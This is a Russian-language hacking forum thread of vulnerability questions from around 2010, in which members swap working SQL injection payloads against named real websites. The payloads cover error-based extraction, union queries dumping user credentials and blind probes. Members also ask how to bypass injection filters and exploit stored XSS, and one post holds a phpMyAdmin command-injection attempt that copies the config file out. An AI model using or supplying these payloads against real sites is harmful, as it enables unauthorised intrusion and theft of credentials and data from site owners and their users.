Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    1 or 1=(select Val collate Cyrillic_General_CI_AS top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama'))

    мб Val ненужен, и мб перед from поставить, сгуглил просто.

    http://www.sql.ru/forum/actualthread.aspx?tid=415606
     
  2. 4p3

    4p3 Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    142
    Likes Received:
    30
    Reputations:
    0
    Благодарю, я видел эту тему.
    Все равно это не решает вопроса с кодировкой, ну и ладно. Видать, встроенными функциями этого не сделать. Пробовал уже и множество чаров, но нет.

    Скуль - боян, но интересно, как его раскрутили пару лет назад.
     
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    не как не мояу узнать числу..
    помоqите//
     
  4. Medic01

    Medic01 New Member

    Joined:
    8 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть сайт http://live-cs.ru/, на нем при установке статуса в профиле(http://live-cs.ru/people/Medic/ например) срабатывает введенный код, как это можно использовать, чтобы какой-нибудь другой юзер выполнил действие кода?
     
  5. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2LokbatanLi
    c чего ты взял что там скуля?
    нет результата...

    вопрос
    site?indwx.php?keyword=1'
    никак не обойти?
    заменять ' на %27 пробовал
     
  6. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    Помогите найти админку http://www.f1-world.ru
     
  7. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.tomydate.com/search_results.php?keyword=1'
    помогите)
     
  8. overcrookd

    overcrookd New Member

    Joined:
    8 Mar 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    плз подскажыте по посту #11976 я пока только учусь и эта "задачка" ну просто рвет мне мозг, не давая покоя.
     
  9. mental2

    mental2 Elder - Старейшина

    Joined:
    13 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    phpmyadmin

    при запросе..

    site.com/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by="]); OR exec('cp $(pwd)"/config.inc.php" config.txt'); &sort_order=desc&token=....

    На сколько я понял в документации стоит специальная ошибка (или не стоит :) ).. но исправив её всё-равно не работает. Тестирую на версии 2.11.8.1

    Выбивает ошибку.

    получается фильтруется переменная sort_by? Или может я где накосячил?
     
    #11689 mental2, 9 Mar 2010
    Last edited: 9 Mar 2010
  10. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)--+
    нету там доступа к файлам
    так датадир это домашняя дира самого мускула, кстате еслиб была возможность читать файлы можно было бы слить сразу инфу всю с таблиц если буфер позволит) а то что при ошибки это директория самого сайта видная из веба
     
    #11690 warlok, 9 Mar 2010
    Last edited: 9 Mar 2010
    3 people like this.
  11. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    решил разобратся с логикой запроса от warlok'a
    прочитал статью квазара
    что не так?

    и почему не прокатывает
    http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1))a)--+
     
    #11691 j0ker13, 10 Mar 2010
    Last edited: 10 Mar 2010
  12. overcrookd

    overcrookd New Member

    Joined:
    8 Mar 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    дело в этом:

    union SELECT concat_ws(0x3a,user,password)+FROM user LIMIT 0,1--+

    перебор лимитом:
    0,1
    1,1
    2,1 и т.д.
     
    #11692 overcrookd, 10 Mar 2010
    Last edited: 10 Mar 2010
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from+(select+count(0),concat((select+user()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
     
    1 person likes this.
  14. overcrookd

    overcrookd New Member

    Joined:
    8 Mar 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    чёт не могу втыкнуть в этот запрос совсем, не могли бы обьяснить или сылку дать
    просто в других иньекциях не пашет
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    нужна помощь:
    в скрипте стоит защита такого плана. Насколько я понял, ищется вхождение слов from и union в запрос(ну вернее в id). Если они есть, то сервер выдаёт error с мылом web-мастера. Как можно обойти это дело?
    FrOm не подходит
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ссылку надо, вариантов масса (защиты)
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    http://www.gtbit.org/news/viewitem.php?id=37

    ещё в чём фишка:
    если так
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))=53
    то страница Not Acceptable
    а если
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123+from+123),1,1))=53
    то Internal Server Error

    Довольно странно, получается что запрос выполняется
     
    #11697 Seravin, 10 Mar 2010
    Last edited: 10 Mar 2010
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    оно там еще по ip банит, сцуко
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
    PHP:
    $id=$_GET['id'];
    $id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
    if (strstr('from',$id)>0showerror;
    как такое обойти?
     
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    карочи я вообще задолбался раскрутит эту скул:
    никак не могу обходит фильтр кавычки, всё перепробовал
    может кто посоветует обход
     
Thread Status:
Not open for further replies.